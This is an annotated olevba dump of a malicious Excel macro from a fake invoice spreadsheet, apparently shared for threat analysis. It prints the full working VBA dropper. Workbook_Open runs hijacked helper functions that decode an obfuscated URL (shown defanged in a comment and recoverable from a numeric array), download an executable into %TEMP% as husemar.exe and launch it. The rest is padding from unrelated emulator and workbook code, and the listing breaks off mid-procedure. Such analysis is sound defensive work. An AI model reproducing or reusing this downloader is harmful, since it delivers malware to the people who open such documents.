dynamoo

Malicious Excel macro

Nov 24th, 2015
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASIHB-V invoice_1366976_08-01-13-04.xls
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: invoice_1366976_08-01-13-04.xls
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ЭтаКнига.cls
  13. in file: invoice_1366976_08-01-13-04.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Private Sub Workbook_Open()
      ' Auto-exec entry point: olevba's summary table lists Workbook_Open as running when
      ' the workbook is opened. The five calls use names borrowed from unrelated utility
      ' and emulator code, but the statements spliced into those procedures form a
      ' download -> save -> launch chain (see the per-call notes).
      ' Triage pointers that follow from this listing: an Office process issuing an HTTP GET,
      ' a file named husemar.exe appearing under %TEMP%, and that file being launched.
  16. PreencherDireita "", "", 0 ' step 1: creates Microsoft.XMLHTTP and opens a GET to the decoded URL
  17. runAlleStatMod ' step 2: creates ADODB.Stream, Shell.Application and the WScript.Shell process environment
  18. txs6502 ' step 3: sends the request, builds the %TEMP%\husemar.exe path, opens the stream in binary mode
  19. rora6502 ' step 4: writes the HTTP response body to that path
  20. IsDigit "" ' step 5: hands the saved file to Shell.Application.Open
  21. End Sub
  22.  
  23.  
  24.  
  25.  
  26.  
  27.  
  28.  
  29. -------------------------------------------------------------------------------
  30. VBA MACRO Лист1.cls
  31. in file: invoice_1366976_08-01-13-04.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
  32. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  33. (empty macro)
  34. -------------------------------------------------------------------------------
  35. VBA MACRO Лист2.cls
  36. in file: invoice_1366976_08-01-13-04.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
  37. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  38. (empty macro)
  39. -------------------------------------------------------------------------------
  40. VBA MACRO Лист3.cls
  41. in file: invoice_1366976_08-01-13-04.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
  42. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  43. (empty macro)
  44. -------------------------------------------------------------------------------
  45. VBA MACRO Module1.bas
  46. in file: invoice_1366976_08-01-13-04.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
  47. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  48. Public Const ads = "Adodb.Stream" ' ProgID passed to CreateObject in runAlleStatMod (stream used to save the download)
  49. Public Const sha = "Shell.Application" ' ProgID passed to CreateObject in runAlleStatMod (object whose Open is called in IsDigit)
  50. Public Const wss = "WScript.Shell" ' ProgID passed to CreateObject in runAlleStatMod (source of the environment collection)
  51. Public Const ps = "Process" ' argument to WScript.Shell.Environment in runAlleStatMod; TEMP is read from it in txs6502
  52. Public Function FormatarTexto(ByVal texto As String, ParamArray formatos() As Variant) As String
      ' Text formatter: scans texto for "$<digits>" tokens and substitutes entries of the
      ' formatos array; everything else is copied through unchanged.
      ' Not called from Workbook_Open in this listing, so it reads as filler.
      ' Caveat for anyone emulating the macro: the IsDigit it calls has been hijacked in this
      ' sample (it calls phy650003.Open on phy650002 and exits), so reaching the "$" branch
      ' would trigger that call instead of a digit test.
  53.  Dim i As Long
  54.  Dim formats_size As Integer
  55.  Dim formated_text As String
  56.  Dim text_size As Integer
  57.  Dim tokens() As String
  58.  Dim ch As String
  59.  Dim format_token_position_string As String
  60.  Dim format_token_position As Integer
  61.  Dim is_digit As Boolean
  62.  Dim lower_bound As Integer
  63.  Dim formato() As Variant
  64.  Dim sub_formato() As Variant
  65.  Dim last_dimenssion As Integer
  66.  formato = formatos
      ' Repeatedly unwraps element 0 until the assignment raises an error, which jumps to Singl.
  67.  On Error GoTo Singl
  68.  For i = 0 To 60000
  69.  sub_formato = formato(0)
  70.  formato = sub_formato
  71.  Next i
  72. Multi:
  73.  formato = formatos(0)
  74. Singl:
  75.  On Error GoTo 0
  76.  i = 1
  77.  formats_size = UBound(formato)
  78.  text_size = Len(texto)
      ' Upper bound 0 is treated as "nothing to substitute": return the input as-is.
  79.  If formats_size = 0 Then
  80.  formated_text = texto
  81.  GoTo Finally
  82.  End If
  83.  Do While i <= text_size
  84.  ch = Mid(texto, i, 1)
  85.  If ch = "$" Then
  86.  format_token_position_string = ""
  87.  i = i + 1
  88.  Do While i <= text_size
  89.  ch = Mid(texto, i, 1)
      ' In this sample IsDigit does not test the character; see the note at the top.
  90.  is_digit = IsDigit(ch)
  91.  If is_digit Then
  92.  format_token_position_string = ch & format_token_position_string
  93.  End If
  94.  If Not is_digit Or i = text_size Then
  95.  format_token_position = CInt(format_token_position_string) - 1
  96.  If format_token_position <= formats_size Then
  97.  formated_text = formated_text & CStr(formato(format_token_position)) + ch
  98.  Else
  99.  formated_text = formated_text & "$" & CStr(format_token_position - formats_size) + ch
  100.  End If
  101.  Exit Do
  102.  End If
  103.  i = i + 1
  104.  Loop
  105.  Else
  106.  formated_text = formated_text & ch
  107.  End If
  108.  i = i + 1
  109.  Loop
  110.  GoTo Finally
       ' No On Error statement in this function targets Catch; it is only reachable by fall-through,
       ' which the GoTo Finally above prevents.
  111. Catch:
  112.  formated_text = Err.Description
  113. Finally:
  114.  FormatarTexto = formated_text
  115. End Function
  116. Public Function phy650_3_3(phy650_3_1() As Variant, phy650_3_2 As Integer) As String
       ' String de-obfuscator used to hide the download URL from static string scans.
       ' phy650_3_1: array of numbers, one per output character.
       ' phy650_3_2: numeric key; the only caller in this listing (PreencherDireita) passes 41.
       ' Returns the decoded string: each element minus the key minus 2845, converted with Chr.
       ' With key 41 the effective offset is 2886, which is enough to decode the array offline
       ' without running the macro.
  117.     Dim i As Integer
  118.     Dim result As String
  119.     result = ""
  120.     For i = LBound(phy650_3_1) To UBound(phy650_3_1)
  121.         result = result & Chr(phy650_3_1(i) - phy650_3_2 - 2845)
  122.     Next i
  123.     phy650_3_3 = result
  124. End Function
  125. Public Function PreencherEsquerda( _
  126.  ByVal texto As String, _
  127.  ByVal caracter_a_preencher As String, _
  128.  ByVal tamanho_final As Integer, _
  129.  Optional truncar As Boolean _
  130. ) As String
       ' Left-pads texto with caracter_a_preencher up to tamanho_final characters.
       ' If texto is already longer, it is returned unchanged unless truncar is True,
       ' in which case it is cut to the first tamanho_final characters.
       ' Contains no injected statements and is not called from Workbook_Open in this listing;
       ' compare with PreencherDireita, the sibling that carries the network code.
  131.  Dim novo_texto As String
  132.  Dim quantidade_a_adicionar As Integer
  133.  novo_texto = texto
  134.  quantidade_a_adicionar = tamanho_final - Len(texto)
  135.  If quantidade_a_adicionar < 0 Then
  136.  If truncar Then
  137.  novo_texto = Mid(texto, 1, tamanho_final)
  138.  End If
  139.  GoTo Finally
  140.  End If
       ' Space(n) builds n blanks, which Replace turns into n copies of the pad string.
  141.  novo_texto = Replace(Space(quantidade_a_adicionar), " ", caracter_a_preencher) + novo_texto
  142. Catch:
  143. Finally:
  144.  PreencherEsquerda = novo_texto
  145. End Function
  146. Function PreencherDireita( _
  147.  ByVal texto As String, _
  148.  ByVal caracter_a_preencher As String, _
  149.  ByVal tamanho_final As Integer, _
  150.  Optional truncar As Boolean _
  151. )
       ' Right-padding helper with four injected statements (list lines 154-157) that prepare
       ' the download. It is the first call made by Workbook_Open, with arguments "", "", 0,
       ' so the padding logic is a no-op and only the injected statements matter.
  152.  Dim novo_texto As String
  153.  Dim quantidade_a_adicionar As Integer
       ' Injected: the ProgID is split with "+" so "Microsoft.XMLHTTP" never appears as one
       ' literal; olevba still reports it as a VBA string expression. phy65007 is a Public
       ' variable declared in Module2, so the object outlives this call.
  154. Set phy65007 = CreateObject("Microsoft" + ".XMLHTTP")
  155. Dim urlAr() As Variant
       ' Injected: obfuscated URL. Decoded offline with the phy650_3_3 arithmetic
       ' (value - 41 - 2845) it reads, defanged: hxxp://villmarkshest[.]no/7745gd/4dgrgdg[.]exe
  156. urlAr = Array(2990, 3002, 3002, 2998, 2944, 2933, 2933, 3004, 2991, 2994, 2994, 2995, 2983, 3000, 2993, 3001, 2990, 2987, 3001, 3002, 2932, 2996, 2997, 2933, 2941, 2941, 2938, 2939, 2989, 2986, 2933, 2938, 2986, 2989, 3000, 2989, 2986, 2989, 2932, 2987, 3006, 2987)
       ' Injected: prepares a GET to the decoded URL; the third argument False makes the
       ' request synchronous. Nothing is sent here; Send is called later in txs6502.
  157. phy65007.Open "GET", phy650_3_3(urlAr, 41), False
  158.  novo_texto = texto
  159.  quantidade_a_adicionar = tamanho_final - Len(texto)
  160.  If quantidade_a_adicionar < 0 Then
  161.  If truncar Then
  162.  novo_texto = Mid(texto, 1, tamanho_final)
  163.  End If
  164.  GoTo Finally
  165.  End If
  166.  novo_texto = novo_texto + Replace(Space(quantidade_a_adicionar), " ", caracter_a_preencher)
  167. Catch:
  168. Finally:
  169.  PreencherDireita = novo_texto
  170. End Function
  171. Function RGB( _
  172.  ByVal red As Integer, _
  173.  ByVal green As Integer, _
  174.  ByVal blue As Integer _
  175. ) As Long
       ' Thin wrapper that forwards to the built-in VBA.Information.RGB and returns its result.
       ' Carries no injected statements and is not called from Workbook_Open in this listing.
  176.  RGB = VBA.Information.RGB(red, green, blue)
  177. End Function
  178. Public Function Juntar( _
  179.  ByVal separador As String, _
  180.  ParamArray elementos() As Variant _
  181. ) As String
       ' Joins the elementos arguments into one string with separador between them (wrapper around Join).
       ' Carries no injected statements and is not called from Workbook_Open in this listing.
  182.  Juntar = Join(elementos, separador)
  183. End Function
  184. Public Function IsDigit(ByVal ch As String) As Boolean
       ' Hijacked helper and final step of the Workbook_Open chain: despite the name, the
       ' first statement calls Open on phy650003 (set to Shell.Application in runAlleStatMod)
       ' with phy650002 (the %TEMP%\husemar.exe path built in txs6502), i.e. it launches the
       ' file that rora6502 saved.
       ' The call is split across two lines with a line continuation, so the text
       ' "phy650003.Open" never appears on a single line.
       ' ch is ignored on this path, and the function returns the Boolean default (False).
  185. phy650003. _
  186. Open (phy650002)
  187. Exit Function
       ' Unreachable after Exit Function: the remains of the original digit test.
  188.  Dim asc_code As Integer
  189.  asc_code = Asc(ch)
  190.  IsDigit = (asc_code > 48 And asc_code < 58)
  191. End Function
  192.  
  193.  
  194.  
  195.  
  196.  
  197.  
  198.  
  199.  
  200. -------------------------------------------------------------------------------
  201. VBA MACRO Module2.bas
  202. in file: invoice_1366976_08-01-13-04.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
  203. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  204. Public phy65007 As Object ' Microsoft.XMLHTTP request object (created in PreencherDireita, sent in txs6502, read in rora6502)
  205. Public phy65008 As Object ' ADODB.Stream (created in runAlleStatMod, opened in txs6502, written and saved in rora6502)
  206. Public phy65009  As Object ' WScript.Shell.Environment("Process") collection (set in runAlleStatMod, TEMP read in txs6502)
  207. Public phy650001 As String ' value of the TEMP environment variable (set in txs6502)
  208. Public phy650002 As String ' full drop path: TEMP + "\husemar.exe" (set in txs6502, used in rora6502 and IsDigit)
  209. Public phy650003 As Object ' Shell.Application (created in runAlleStatMod, its Open is called in IsDigit)
  210. Public Sub runAlleStatMod()
       ' Second call in the Workbook_Open chain. Only the three CreateObject lines execute;
       ' the Exit Sub that follows them makes the rest of the body unreachable.
       ' The ProgIDs come from the Module1 constants ads, sha, wss and ps, so none of the
       ' string literals appear next to CreateObject in this module.
  211.  Dim kuerzel As Variant
  212.  Dim nameTN As Variant
  213.  Set phy65008 = CreateObject(ads)
  214.  Set phy650003 = CreateObject(sha)
  215.  
       ' Environment("Process") is the collection that txs6502 indexes with "TEMP".
  216. Set phy65009 = CreateObject(wss).Environment(ps)
  217. Exit Sub
       ' Unreachable filler from here on. Several identifiers contain a dot that the matching
       ' name in runEinStatMod does not (setzteBezugsjah.rImStatischenModell vs
       ' setzteBezugsjahrImStatischenModell). NOTE(review): presumably the names were mangled
       ' when the filler was pasted in; the listing does not show why.
  218.  setzteBezugsjah.rImStatischenModell
  219.  erstelleKo.pfzeileMETA
  220.  erstelleMi.ttelwerteMETA
  221.  For Each kuerzel In gibAlleTN_Kuerzel
  222.  If kuerzel = "SH" Or kuerzel = "AG" Then
  223.  Else
  224.  nameTN = gibT.Nname(kuerzel)
  225.  runSFA nameTN
  226.  exportiereSta.tischeResultateSFA nameTN
  227.  erstelleP.DFundPNG nameTN
  228.  End If
  229.  Next kuerzel
  230.  If TEST = False Then _
  231.  MsgBox "Die statischen Modelle sind fertig bearbeitet." & vbNewLine & _
  232.  "Die Kantone AG und SH wurden nicht berechnet.", vbInformation
  233. End Sub
  234. Sub runEinStatMod()
       ' Filler: sets up a reference year, picks a name via gibAlleOderNameTN and passes it to runSFA.
       ' Not called from Workbook_Open in this listing; the helpers it calls are not defined in
       ' any module shown here.
  235.  Dim nameTN As String
  236.  setzteBezugsjahrImStatischenModell
  237.  nameTN = gibAlleOderNameTN
  238.  runSFA nameTN
  239. End Sub
  240. Sub runSFA(ByVal nameTN As String)
       ' Filler from what looks like an unrelated workbook-automation project: opens a model
       ' workbook, imports data into it, then saves or closes it.
       ' Only referenced from runEinStatMod and from the unreachable part of runAlleStatMod,
       ' so it is not on the Workbook_Open path in this listing.
       ' NOTE(review): wbSFA is declared As String but is assigned with Set and used as a
       ' workbook object below; the declaration looks altered and the code is not expected to run.
  241.  Dim wbSFA As String
  242.  Dim pfadSFA As String
  243.  pfadSFA = gibPfadZumStat_Modell & gibName_Statisches_Modell
  244.  Application.ScreenUpdating = False
  245.  Application.StatusBar = True
  246.  Application.StatusBar = "Es wird " & nameTN & " bearbeitet."
  247.  kopiereDefault_stat nameTN, gibBezugsjahr
  248.  kopiereAngabenTN nameTN
  249.  On Error Resume Next
  250.  Set wbSFA = Workbooks(pfadSFA)
  251.  If wbSFA Is Nothing Then _
  252.  Set wbSFA = Workbooks.Open(pfadSFA)
  253.  setzeAlleineOderAlleImModell wbSFA
  254.  importiereDefaultwerteInsModell wbSFA
  255.  importiereDATAinsModell wbSFA
  256.  kopiereDefaultWerteImModell wbSFA
       ' The macro names passed to Application.Run are empty strings in this sample.
       ' NOTE(review): these three calls are a likely source of the "Run" keyword hit in
       ' olevba's summary, rather than an actual command execution - confirm when triaging.
  257.  Application.Run ""
  258.  Application.Run ""
  259.  Application.Run ""
  260.  Application.StatusBar = ""
  261.  Application.ScreenUpdating = True
  262.  If gibAlleOderNameTN <> "Alle" Then
  263.  wbSFA.Activate
  264.  wbSFA.Save
  265.  If TEST = False Then
  266.  MsgBox "Das Modell kann nun bearbeitet werden. " & _
  267.  "Ge?nderte Default-Werte werden beim Schliessen exportiert.", vbInformation
  268.  End If
  269.  End
  270.  Else
  271.  wbSFA.Close SaveChanges:=True
  272.  Set wbSFA = Nothing
  273.  End If
  274. End Sub
  275. Private Sub importiereDefaultwerteInsModell(wbModell As String)
       ' Filler: copies two value ranges from the "Tabelle1" sheet of a workbook opened from
       ' gibPfadZumStat_Modell into the ".Default" sheet of the model workbook.
       ' Only called from runSFA, which is not on the Workbook_Open path in this listing.
       ' NOTE(review): wbDefault is declared As String yet assigned with Set and used as a
       ' workbook; On Error Resume Next would also hide any runtime failure here.
  276.  Dim wbDefault As String
  277.  Dim wsModell As Worksheet
  278.  Dim wsWerte As Worksheet
  279.  Dim LETZTE_ZEILE_PARAMETER As Integer
  280.  LETZTE_ZEILE_PARAMETER = 52
  281.  On Error Resume Next
  282.  Set wbDefault = Workbooks.Open(gibPfadZumStat_Modell & "Default_stat.dDATA")
  283.  Set wsWerte = wbDefault.Worksheets("Tabelle1")
  284.  Set wsModell = Workbooks(gibName_Statisches_Modell).Worksheets(".Default")
  285.  wsWerte.Range("E1:E" & LETZTE_ZEILE_PARAMETER).Copy
  286.  wsModell.Range("F1:F" & LETZTE_ZEILE_PARAMETER).PasteSpecial xlPasteValues
  287.  Application.CutCopyMode = False
  288.  wsWerte.Range("N1:N27").Copy
  289.  wsModell.Range("N1:N27").PasteSpecial xlPasteValues
  290.  Application.CutCopyMode = False
  291.  wbDefault.Close
  292.  Set wbDefault = Nothing
  293. End Sub
  294. Private Sub importiereDATAinsModell(wbModell As String)
       ' Filler: opens "\DATA_stat.xls" under gibPfadZumStat_Modell and pastes fixed ranges from
       ' its sheets into the "Bauwerk", ".Fluesse" and ".Params" sheets of the model workbook,
       ' then writes "=" into eight cells of ".Default".
       ' Only called from runSFA, which is not on the Workbook_Open path in this listing.
       ' NOTE(review): wbModell and wbNach are typed As String but used as workbook objects;
       ' the declarations look altered and this code is not expected to run as written.
  295.  Dim wbVon, wbNach As String
  296.  Dim wsVon, wsNach As Worksheet
  297.  Set wbVon = Workbooks.Open(gibPfadZumStat_Modell & "\DATA_stat.xls")
  298.  Set wbNach = wbModell
  299.  Set wsNach = wbModell.Worksheets("Bauwerk")
  300.  Set wsVon = wbVon.Worksheets("HB_GebVol")
  301.  wsVon.Range("B2:G7").Copy
  302.  wsNach.Range("C4:H9").PasteSpecial xlPasteValues
  303.  Set wsVon = wbVon.Worksheets("HB_Material")
  304.  wsVon.Range("B2:G9").Copy
  305.  wsNach.Range("C14:H21").PasteSpecial xlPasteValues
  306.  Set wsVon = wbVon.Worksheets("HB_Mat_Neubau")
  307.  wsVon.Range("B2:G9").Copy
  308.  wsNach.Range("C26:H33").PasteSpecial xlPasteValues
  309.  Set wsVon = wbVon.Worksheets("TB")
  310.  wsVon.Range("B10:I12").Copy
  311.  wsNach.Range("C37:E44").PasteSpecial Paste:=xlPasteValues, Transpose:=True
  312.  Set wsVon = wbVon.Worksheets("Angaben_Materialfluesse")
  313.  Set wsNach = wbNach.Worksheets(".Fluesse")
  314.  wsVon.Range("E4:G25").Copy
  315.  wsNach.Range("D4:F25").PasteSpecial xlPasteValues
  316.  Set wsVon = wbVon.Worksheets("Angaben_Materialfluesse")
  317.  Set wsNach = wbNach.Worksheets(".Params")
  318.  wsVon.Range("E23:E24").Copy
  319.  wsNach.Range("F4:F5").PasteSpecial xlPasteValues
  320.  Application.CutCopyMode = False
  321.  wbVon.Close
  322.  Set wsNach = wbNach.Sheets(".Default")
       ' The formula text after "=" is empty in this sample.
  323.  wsNach.Range("F26").FormulaLocal = "="
  324.  wsNach.Range("F27").FormulaLocal = "="
  325.  wsNach.Range("F28").FormulaLocal = "="
  326.  wsNach.Range("F29").FormulaLocal = "="
  327.  wsNach.Range("F31").FormulaLocal = "="
  328.  wsNach.Range("F32").FormulaLocal = "="
  329.  wsNach.Range("F33").FormulaLocal = "="
  330.  wsNach.Range("F34").FormulaLocal = "="
  331.  Set wbVon = Nothing
  332.  Set wbNach = Nothing
  333. End Sub
  334. Private Sub kopiereDefaultWerteImModell(wbModell As String)
       ' Filler: copies the values of F1:F52 on the ".Default" sheet to G1:G52 on the
       ' "Variablen" sheet, making ".Default" visible only for the duration of the copy.
       ' Only called from runSFA, which is not on the Workbook_Open path in this listing.
       ' NOTE(review): wbModell is typed As String but used as a workbook object.
  335.  Dim wsVon As Worksheet, wsNach As Worksheet
  336.  Set wsVon = wbModell.Sheets(".Default")
  337.  Set wsNach = wbModell.Sheets("Variablen")
  338.  wsVon.Visible = True
  339.  wsNach.Range("G1:G52").Value = wsVon.Range("F1:F52").Value
  340.  wsVon.Visible = False
  341. End Sub
  342.  
  343.  
  344.  
  345.  
  346.  
  347.  
  348.  
  349.  
  350. -------------------------------------------------------------------------------
  351. VBA MACRO Module3.bas
  352. in file: invoice_1366976_08-01-13-04.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module3'
  353. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  354.  
  355. ' This is where all 6502 instructions are kept.
       ' Analyst note: this module is 6502 CPU-emulator code used as bulk padding. Workbook_Open
       ' calls only two of its procedures, txs6502 and rora6502, and both have had unrelated
       ' statements plus an early Exit Sub inserted at the top. The emulator state it relies on
       ' (A, X, Y, P, PC, s, Read6502, Write6502, SetFlags, addrmode) is not defined in any
       ' module shown in this listing.
  356. Public Sub adc6502()
       ' Emulator filler: add-with-carry on the accumulator A. Not called from Workbook_Open.
  357.  Dim tmp As Long ' Integer
  358. adrmode opcode
  359.  Value = Read6502(savepc)
       ' Bit &H1 of P is used as the carry-in.
  360.  saveflags = (P And &H1)
  361.  Sum = A
  362.  Sum = (Sum + Value) And &HFF
  363.  Sum = (Sum + saveflags) And &HFF
       ' Sets or clears bit &H40 of P depending on the 8-bit sum.
  364.  If (Sum > &H7F) Or (Sum < -&H80) Then
  365.  P = P Or &H40
  366.  Else
  367.  P = (P And &HBF)
  368.  End If
       ' Recomputes the sum without masking to derive the carry-out into bit &H1 of P.
  369.  Sum = A + (Value + saveflags)
  370.  If (Sum > &HFF) Then
  371.  P = P Or &H1
  372.  Else
  373.  P = (P And &HFE)
  374.  End If
  375.  A = Sum And &HFF
       ' When bit &H8 of P is set, adjusts each nibble of A that exceeds 9.
  376.  If (P And &H8) Then
  377.  P = (P And &HFE)
  378.  If ((A And &HF) > &H9) Then
  379.  A = (A + &H6) And &HFF
  380.  End If
  381.  If ((A And &HF0) > &H90) Then
  382.  A = (A + &H60) And &HFF
  383.  P = P Or &H1
  384.  End If
  385.  Else
  386.  clockticks6502 = clockticks6502 + 1
  387.  End If
  388.  SetFlags A
  389. End Sub
  390. Public Sub adrmode(opcode As Byte)
       ' Emulator filler: resolves the operand address for opcode into savepc and advances PC,
       ' dispatching on addrmode(opcode). Simple modes are handled inline; the others call a
       ' per-mode helper that is not defined in this listing. Unknown modes are printed to the
       ' Immediate window. Not called from Workbook_Open.
  391. Select Case addrmode(opcode)
  392.  Case ADR_ABS: savepc = Read6502(PC) + (Read6502(PC + 1) * &H100&): PC = PC + 2
  393.  Case ADR_ABSX: absx6502
  394.  Case ADR_ABSY: absy6502
  395.  Case ADR_IMP: ' nothing really necessary cause implied6502 = ""
  396. Case ADR_IMM: savepc = PC: PC = PC + 1
  397.  Case ADR_INDABSX: indabsx6502
  398.  Case ADR_IND: indirect6502
  399.  Case ADR_INDX: indx6502
  400.  Case ADR_INDY: indy6502
  401.  Case ADR_INDZP: indzp6502
  402.  Case ADR_REL: savepc = Read6502(PC): PC = PC + 1: If (savepc And &H80) Then savepc = savepc - &H100&
  403.  Case ADR_ZP: savepc = Read6502(PC): savepc = savepc And &HFF: PC = PC + 1
  404.  Case ADR_ZPX: zpx6502
  405.  Case ADR_ZPY: zpy6502
  406.  Case Else: Debug.Print addrmode(opcode)
  407. End Select
  408. End Sub
  409. Public Sub and6502()
  410.  adrmode opcode
  411.  Value = Read6502(savepc)
  412.  A = (A And Value)
  413.  SetFlags A
  414. End Sub
  415. Public Sub asl6502()
  416.  adrmode opcode
  417.  Value = Read6502(savepc)
  418.  P = (P And &HFE) Or ((Value \ 128) And &H1)
  419.  Value = (Value * 2) And &HFF
  420.  Write6502 savepc, (Value And &HFF)
  421.  SetFlags Value
  422. End Sub
  423. Public Sub asla6502()
  424.  P = (P And &HFE) Or ((A \ 128) And &H1)
  425.  A = (A * 2) And &HFF
  426.  SetFlags A
  427. End Sub
  428. Public Sub bcc6502()
  429.  If ((P And &H1) = 0) Then
  430.  adrmode opcode
  431.  PC = PC + savepc
  432.  clockticks6502 = clockticks6502 + 1
  433.  Else
  434.  PC = PC + 1
  435.  End If
  436. End Sub
  437. Public Sub bcs6502()
  438.  If (P And &H1) Then
  439.  adrmode opcode
  440.  PC = PC + savepc
  441.  clockticks6502 = clockticks6502 + 1
  442.  Else
  443.  PC = PC + 1
  444.  End If
  445. End Sub
  446. Public Sub beq6502()
  447.  If (P And &H2) Then
  448.  adrmode opcode
  449.  PC = PC + savepc
  450.  clockticks6502 = clockticks6502 + 1
  451.  Else
  452.  PC = PC + 1
  453.  End If
  454. End Sub
  455. Public Sub bit6502()
  456.  adrmode opcode
  457.  Value = Read6502(savepc)
  458.  If (Value And A) Then
  459.  P = (P And &HFD)
  460.  Else
  461.  P = P Or &H2
  462.  End If
  463.  P = ((P And &H3F) Or (Value And &HC0))
  464. End Sub
  465. Public Sub bmi6502()
  466.  If (P And &H80) Then
  467.  adrmode opcode
  468.  PC = PC + savepc
  469.  clockticks6502 = clockticks6502 + 1
  470.  Else
  471.  PC = PC + 1
  472.  End If
  473. End Sub
  474. Public Sub bne6502()
  475.  If ((P And &H2) = 0) Then
  476.  adrmode opcode
  477.  PC = PC + savepc
  478.  Else
  479.  PC = PC + 1
  480.  End If
  481. End Sub
  482. Public Sub bpl6502()
  483.  If ((P And &H80) = 0) Then
  484.  adrmode opcode
  485.  PC = PC + savepc
  486.  Else
  487.  PC = PC + 1
  488.  End If
  489. End Sub
  490. Public Sub brk6502()
  491.  PC = PC + 1
  492.  Write6502 &H100& + s, (PC \ &H100&) And &HFF
  493.  s = (s - 1) And &HFF
  494.  Write6502 &H100& + s, (PC And &HFF)
  495.  s = (s - 1) And &HFF
  496.  Write6502 &H100& + s, P
  497.  s = (s - 1) And &HFF
  498.  P = P Or &H14
  499.  PC = Read6502(&HFFFE&) + (Read6502(&HFFFF&) * &H100&)
  500. End Sub
  501. Public Sub bvc6502()
  502.  If ((P And &H40) = 0) Then
  503.  adrmode opcode
  504.  PC = PC + savepc
  505.  clockticks6502 = clockticks6502 + 1
  506.  Else
  507.  PC = PC + 1
  508.  End If
  509. End Sub
  510. Public Sub bvs6502()
  511.  If (P And &H40) Then
  512.  adrmode opcode
  513.  PC = PC + savepc
  514.  clockticks6502 = clockticks6502 + 1
  515.  Else
  516.  PC = PC + 1
  517.  End If
  518. End Sub
  519. Public Sub clc6502()
  520.  P = P And &HFE
  521. End Sub
  522. Public Sub cld6502()
  523.  P = P And &HF7
  524. End Sub
  525. Public Sub cli6502()
  526.  P = P And &HFB
  527. End Sub
  528. Public Sub clv6502()
  529.  P = P And &HBF
  530. End Sub
  531. Public Sub cmp6502()
  532.  adrmode opcode
  533.  Value = Read6502(savepc)
  534.  If (A + &H100 - Value) > &HFF Then
  535.  P = P Or &H1
  536.  Else
  537.  P = (P And &HFE)
  538.  End If
  539.  Value = (A + &H100 - Value) And &HFF
  540.  SetFlags Value
  541. End Sub
  542. Public Sub cpx6502()
  543.  adrmode opcode
  544.  Value = Read6502(savepc)
  545.  If (X + &H100 - Value > &HFF) Then
  546.  P = P Or &H1
  547.  Else
  548.  P = (P And &HFE)
  549.  End If
  550.  Value = (X + &H100 - Value) And &HFF
  551.  SetFlags Value
  552. End Sub
  553. Public Sub cpy6502()
  554.  adrmode opcode
  555.  Value = Read6502(savepc)
  556.  If (Y + &H100 - Value > &HFF) Then
  557.  P = (P Or &H1)
  558.  Else
  559.  P = (P And &HFE)
  560.  End If
  561.  Value = (Y + &H100 - Value) And &HFF
  562.  SetFlags Value
  563. End Sub
  564. Public Sub dec6502()
  565.  adrmode opcode
  566.  Write6502 (savepc), (Read6502(savepc) - 1) And &HFF
  567.  Value = Read6502(savepc)
  568.  If (Value) Then
  569.  P = P And &HFD
  570.  Else
  571.  P = P Or &H2
  572.  End If
  573.  If (Value And &H80) Then
  574.  P = P Or &H80
  575.  Else
  576.  P = P And &H7F
  577.  End If
  578. End Sub
  579. Public Sub dex6502()
  580.  X = (X - 1) And &HFF
  581.  If (X) Then
  582.  P = P And &HFD
  583.  Else
  584.  P = P Or &H2
  585.  End If
  586.  If (X And &H80) Then
  587.  P = P Or &H80
  588.  Else
  589.  P = P And &H7F
  590.  End If
  591. End Sub
  592. Public Sub dey6502()
  593.  Y = (Y - 1) And &HFF
  594.  If (Y) Then
  595.  P = P And &HFD
  596.  Else
  597.  P = P Or &H2
  598.  End If
  599.  If (Y And &H80) Then
  600.  P = P Or &H80
  601.  Else
  602.  P = P And &H7F
  603.  End If
  604. End Sub
  605. Public Sub eor6502()
  606.  adrmode opcode
  607.  A = A Xor Read6502(savepc)
  608.  If (A) Then
  609.  P = P And &HFD
  610.  Else
  611.  P = P Or &H2
  612.  End If
  613.  If (A And &H80) Then
  614.  P = P Or &H80
  615.  Else
  616.  P = P And &H7F
  617.  End If
  618. End Sub
  619. Public Sub inc6502()
  620.  adrmode opcode
  621.  Write6502 (savepc), (Read6502(savepc) + 1) And &HFF
  622.  Value = Read6502(savepc)
  623.  If (Value) Then
  624.  P = P And &HFD
  625.  Else
  626.  P = P Or &H2
  627.  End If
  628.  If (Value And &H80) Then
  629.  P = P Or &H80
  630.  Else
  631.  P = P And &H7F
  632.  End If
  633. End Sub
  634. Public Sub inx6502()
  635.  X = (X + 1) And &HFF
  636.  If (X) Then
  637.  P = P And &HFD
  638.  Else
  639.  P = P Or &H2
  640.  End If
  641.  If (X And &H80) Then
  642.  P = P Or &H80
  643.  Else
  644.  P = P And &H7F
  645.  End If
  646. End Sub
  647. Public Sub iny6502()
  648.  Y = (Y + 1) And &HFF
  649.  If (Y) Then
  650.  P = P And &HFD
  651.  Else
  652.  P = P Or &H2
  653.  End If
  654.  If (Y And &H80) Then
  655.  P = P Or &H80
  656.  Else
  657.  P = P And &H7F
  658.  End If
  659. End Sub
  660. Public Sub jmp6502()
  661.  adrmode opcode
  662.  PC = savepc
  663. End Sub
  664. Public Sub jsr6502()
  665.  PC = PC + 1
